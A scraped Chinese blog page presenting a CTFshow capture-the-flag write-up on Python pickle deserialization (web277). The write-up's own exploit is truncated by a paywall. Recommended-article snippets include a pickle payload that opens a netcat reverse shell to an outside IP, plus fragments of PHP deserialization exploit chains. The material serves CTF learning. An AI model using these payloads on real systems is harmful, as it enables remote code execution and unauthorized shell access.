CTFshow 反序列化 web277

最新推荐文章于 2024-07-17 23:31:19 发布
最新推荐文章于 2024-07-17 23:31:19 发布
阅读量660 收藏
点赞数
分类专栏: CTFshow 文章标签: bash linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kracxi/article/details/122901145
版权

pickle 反序列化 反弹shell nc连接 os.system
关键词由优快云通过智能技术生成

目录

源码

查看源代码 提示pickle,得知考点是pickle反序列化

题解

exp
试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上就会自动断开

import base64
import pickle


class shell(object):
    def __reduce__(self):
最低0.47元/天 解锁文章
CTFshow 反序列化 web278
Kradress的博客
02-12 252
目录思路题解总结 思路 题目提示了过滤了os.system,那么我们把system改成popen().read() 题解 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",)) k = shell() print(bas
CTFshow 反序列化 web274
Kradress的博客
02-12 382
目录源码思路题解总结 源码 源码中提示反序列化入口 思路 去网上搜下ThinkPHP 5.1相关的漏洞 题解 找到2个exp 第一个 <?php namespace think; abstract class Model{ protected $append = []; private $data = []; function __construct(){ //GET传参 shell $this->data = ['shell' =
[CTFSHOW][反序列化]web277web278:python反序列化漏洞
weixin_53958123的博客
06-03 919
当时没有公网IP的服务器,就测试了能不能利用无回显sleep盲打脚本来弹出flag。先测试了以下sleep 5命令执行成功。用之前盲打脚本改了一下:
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 9207
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
ctf.show反序列化(web254-web278)
wanan的博客
08-31 8864
ctf.show反序列化(web254-web278)
ctfshow web入门 php反序列化 web275--web278(无web276)
2301_81040377的博客
05-10 598
后面的内容,但是作者这里用了两个。这道题和序列化一点关系都没有。是文件内容,但是外面的这个。python序列化,EXP。这里其实就可以理解为我传。就是输入流得到的内容就是。来混淆,filter的。
CTFshow 反序列化 web263
Kradress的博客
12-20 1479
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
CTFshow 反序列化 web270
Kradress的博客
02-11 304
目录题解总结 题解 exp <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-03 21:55:29 # @Last Modified by: h1xa # @Last Modified time: 2021-05-04 01:25:28 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ namespace yii\rest { clas
CTFshow 反序列化 web257
Kradress的博客
12-19 2023
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFshow——web入门——反序列化web254-web278 详细Writeup
Leaf_initial的博客
08-24 3441
在做题之前先简要总结一下知识点。
CTFshow-web入门-php_unserialize-web254-278
m0_72655585的博客
07-17 2268
PHP 序列化及反序列化基础反序列化学习笔记[CTF]PHP反序列化总结。
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2164
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
CTFshow 反序列化 web267
Kradress的博客
02-11 1402
目录思路题解总结 思路 进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变 一个个页面查看源代码,最后再about页面中发现提示 访问?r=site%2Fabout&view-source拿到提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3252
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
Web_学习SSTI和php反序列化完成ctfshow对应题目
2301_79841911的博客
11-12 1517
学习SSTI和php反序列化,完成ctfshow对应题目。
ctfshow web入门反序列化
qq_53063436的博客
11-06 1663
魔术变量: __sleep() //在对象被序列化之前运行 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) __construct() //在类实例化时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
ctfshowweb入门—php反序列化
m0_74013288的博客
11-12 1510
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
ctfshow反序列化
wz0819529的博客
10-21 916
web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ error_reporting(0); highlight_fi..
CTFSHOW大赛原题篇(web741-web755)
羽的博客
02-28 945
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web741web742web743web744web745web750web782web785web786web787web788web789 web741 ssrf绕过 url=http://0.0.0.0:8080/flag web742 web743 a[]=1&b[]=2&c[]=1&d[]=2 web744 <?php class ctfshowCURL{ private $url="file:/
ctfshow 反序列化
最新发布
01-21
### CTFShow平台中的反序列化挑战解决方案 #### 背景介绍 CTFShow是一个提供多种信息安全竞赛题目和教程的学习平台。其中涉及到了许多Web安全漏洞的实践练习,包括SQL注入、XSS攻击以及反序列化漏洞等。 #### 反序列化的概念 反序列化是指将保存的对象状态信息转换为对象的过程。如果应用程序允许用户控制的数据参与此过程,则可能导致严重的安全隐患,如远程代码执行(RCE)[^3]。 #### CTFShow上的反序列化挑战实例 在CTFShow平台上存在多个有关PHP反序列化的挑战案例。通常情况下,这些挑战会给出一个带有已知类定义的服务端脚本,并提示参与者通过构造恶意输入来触发特定行为完成解题目标。 对于此类问题的一般解决思路如下: 1. **分析源码** 查看给定程序逻辑,识别出可能被利用的地方。特别是那些接受外部可控参数并对其进行unserialize()操作的位置[^4]。 2. **寻找可操控点** 寻找能够影响到`__destruct()` 或者 `__wakeup()` 魔术函数调用链路的机会。因为当对象销毁时这两个特殊成员会被自动调用,在这里可以植入自定义指令实现任意命令执行等功能[^5]. 3. **构建Payload** 利用上述发现创建合适的payload字符串,使其能够在服务器上成功解析成预期形态从而达成目的。这一步骤往往需要结合具体环境下的其他条件共同考虑,比如php版本差异等因素都会带来不同表现形式[^6]. ```php // 假设有一个简单的易受攻击的 PHP 类 class VulnerableClass { public $command; function __destruct(){ system($this->command); } } // 构造 Payload 实现反弹 Shell 的例子 (仅作教学用途) $malicious_data = 'O:13:"VulnerableClass":1:{s:7:"command";s:9:"whoami > /tmp/output";}' ``` 请注意以上代码仅为说明原理所用,在实际环境中切勿非法尝试!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值